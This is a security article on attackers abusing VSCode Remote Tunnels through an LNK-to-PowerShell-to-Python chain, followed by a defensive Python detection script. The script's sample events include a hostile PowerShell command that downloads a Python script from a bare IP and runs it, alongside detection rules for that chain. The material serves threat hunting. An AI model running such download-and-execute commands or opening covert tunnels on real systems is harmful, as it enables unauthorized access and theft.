VSCode Remote Tunnels, a legitimate feature of the popular development environment, are increasingly being used by malicious actors.
This feature allows developers to remotely access their local coding environment, which promotes engagement and flexibility.
Malicious actors deliver files or scripts that silently install the VSCode CLI and create a remote tunnel without the user's awareness.
This gives attackers unauthorized access to the developer's device, enabling them to steal confidential data, deploy malware, and move laterally across the network.
According to On the Hunt's blog post, the malicious LNK file that is initially delivered contains a PowerShell command that downloads and executes a Python script from a remote IP address.
The Python script downloads and executes the VSCode CLI binary, code-insiders.exe, and then uses that CLI binary to create a VSCode tunnel and authenticate it through GitHub.
Once the remote tunnel is created, the threat actor connects to it from a web browser and uses it to execute commands on the Python payload.
To authenticate to VSCode without using the attacker's GitHub account, the connect-to-tunnel button is pressed.
Once verified with the account, a list of remote hosts with active tunnels can be observed. Selecting the online victim host will connect to the VSCode remote tunnel running on that host.
This makes it possible to traverse directories on the victim's remote computer. It is also possible to create new files or scripts and run them remotely.
Organizations are advised to restrict remote tunnel access to their own tenants. Where that is not feasible, tunnel use within the estate should be prohibited, or controls that prevent its misuse should be put in place.
By taking such proactive measures against this emerging threat, companies can safeguard their sensitive data and protect the integrity of their development environments.
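As an added illustration of how a defender could hunt for the chain described above (this is not code from the article or from On the Hunt), the following Python scores constructed process-creation events. The CLI binary names and the `tunnel` subcommand come from the article; the parent-process and user-writable-path heuristics, and the sample events themselves, are assumptions.

```python
import re

# Constructed sample process-creation events modelled on the described chain
# (LNK -> PowerShell -> Python -> VSCode CLI tunnel). Not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://203.0.113.10/u.py -OutFile $env:TEMP\\u.py; python $env:TEMP\\u.py"'},
    {"parent": "python.exe", "image": "code-insiders.exe",
     "cmdline": r"C:\Users\dev\AppData\Local\Temp\code-insiders.exe tunnel --name devbox"},
    {"parent": "explorer.exe", "image": "Code.exe",
     "cmdline": r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\proj'},
    {"parent": "cmd.exe", "image": "code.exe",
     "cmdline": r"C:\tools\code\code.exe tunnel"},
]

VSCODE_CLI = {"code.exe", "code-insiders.exe"}
# Interpreters that a developer would not normally use to launch the VSCode CLI (assumed list)
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.I)
# First argument after the (possibly quoted) executable must be the 'tunnel' subcommand
TUNNEL_ARG = re.compile(r'^\s*(?:"[^"]+"|\S+)\s+tunnel\b', re.I)
# A Python script fetched from a bare IPv4 address, as in the initial stage
PY_FROM_IP = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/\S+\.py", re.I)


def tunnel_findings(event):
    """Return a list of (severity, reason) findings for one process-creation event."""
    image, parent = event["image"].lower(), event["parent"].lower()
    cmdline = event["cmdline"]
    findings = []
    if image in VSCODE_CLI and TUNNEL_ARG.match(cmdline):
        reasons = ["VSCode CLI started a remote tunnel"]
        severity = "medium"  # any tunnel is worth a look if the estate does not sanction them
        if parent in SCRIPT_HOSTS:
            reasons.append(f"spawned by script host {parent}")
            severity = "high"
        if USER_WRITABLE.search(cmdline):
            reasons.append("CLI binary runs from a user-writable path")
            severity = "high"
        findings.append((severity, "; ".join(reasons)))
    if image in {"powershell.exe", "pwsh.exe"} and PY_FROM_IP.search(cmdline):
        findings.append(("high", "PowerShell fetches a Python script from a bare IP address"))
    return findings


def scan(events):
    """Run every event through the rules; returns (event index, severity, reason) tuples."""
    return [(i, sev, why) for i, ev in enumerate(events) for sev, why in tunnel_findings(ev)]


if __name__ == "__main__":
    for idx, sev, why in scan(SAMPLE_EVENTS):
        print(f"[{sev}] event {idx}: {why}")
```

The ordinary editor launch (event 2) produces no finding, while the tunnel started by a Python parent from a Temp path scores highest.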